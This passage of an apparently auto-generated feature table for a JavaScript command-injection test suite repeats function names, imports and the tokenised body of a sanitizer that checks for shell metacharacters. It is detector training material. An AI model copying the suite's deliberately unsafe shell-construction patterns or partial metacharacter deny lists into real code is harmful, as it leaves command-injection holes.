./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:6:387:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:6:387:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:6:387:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:6:387:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:6:387:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:13:387:15 | ';' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:13:387:15 | ';' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:13:387:15 | ';' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:13:387:15 | ';' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:13:387:15 | ';' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:4:388:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:4:388:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:4:388:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:4:388:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:4:388:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:4:388:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:4:388:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:4:388:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:4:388:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:4:388:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:4:388:15 | s[i] === '&' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:4:388:15 | s[i] === '&' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:4:388:15 | s[i] === '&' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:4:388:15 | s[i] === '&' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:4:388:15 | s[i] === '&' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:6:388:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:6:388:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:6:388:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:6:388:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:6:388:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:13:388:15 | '&' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:13:388:15 | '&' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:13:388:15 | '&' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:13:388:15 | '&' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:388:13:388:15 | '&' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:4:389:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:4:389:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:4:389:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:4:389:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:4:389:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:4:389:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:4:389:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:4:389:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:4:389:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:4:389:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:4:389:15 | s[i] === '(' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:4:389:15 | s[i] === '(' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:4:389:15 | s[i] === '(' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:4:389:15 | s[i] === '(' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:4:389:15 | s[i] === '(' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:6:389:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:6:389:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:6:389:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:6:389:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:6:389:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:13:389:15 | '(' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:13:389:15 | '(' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:13:389:15 | '(' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:13:389:15 | '(' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:389:13:389:15 | '(' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:4:390:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:4:390:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:4:390:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:4:390:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:4:390:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:4:390:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:4:390:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:4:390:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:4:390:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:4:390:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 